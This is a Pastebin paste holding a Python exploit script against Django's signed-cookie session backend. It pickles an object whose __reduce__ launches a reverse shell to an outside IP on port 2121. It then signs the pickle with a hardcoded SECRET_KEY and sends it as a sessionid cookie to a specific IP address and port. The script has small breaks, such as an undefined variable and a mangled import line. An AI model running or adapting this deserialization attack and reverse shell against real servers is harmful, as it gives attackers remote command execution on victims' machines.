Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os, hashlib, sys, pickle
- import requests, subprocess
- from hmac import new as hmac
- from base64 import b64encode as b64
- class ex(object):
- def __reduce__(self):
- return(os.system,('python -c\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("167.99.X.X",2121));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'',))
- def send_django(key, add, payload):
- def base64(s): #taken from django
- import base64
- return base64.urlsafe_b64encode(s).strip(b'=')
- def salted_hmac(salt, value, secret): #taken from django
- key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
- return hmac(key, msg=value, digestmod=hashlib.sha1).digest()import time
- import baseconv #taken from django
- timestamp = baseconv.base62.encode(str(int(time.time()))).encode()
- print(timestamp)
- data = base64(payload)+b":"+timestamp
- mac = base64(salted_hmac('django.contrib.sessions.backends.signed_cookiessigner', data, key)) #default
- salt by django
- s = '{}:{}:{}'.format(base64(payload).decode(), timestamp.decode(),mac.decode())
- print(s)
- print(requests.get(add, cookies={'sessionid':s}).content)
- last_viewed = {}
- last_viewed['last_viewed'] = ex()#"HACKED"
- p = pickle.dumps(a, protocol=4)
- send_django("14wzd&o9dg1_ukfajt(6)bs5j*nhf2#_=xop^ry_y)5f8m0apq","http://104.250.105.109:19080/", p)
Advertisement
Add Comment
Please, Sign In to add comment
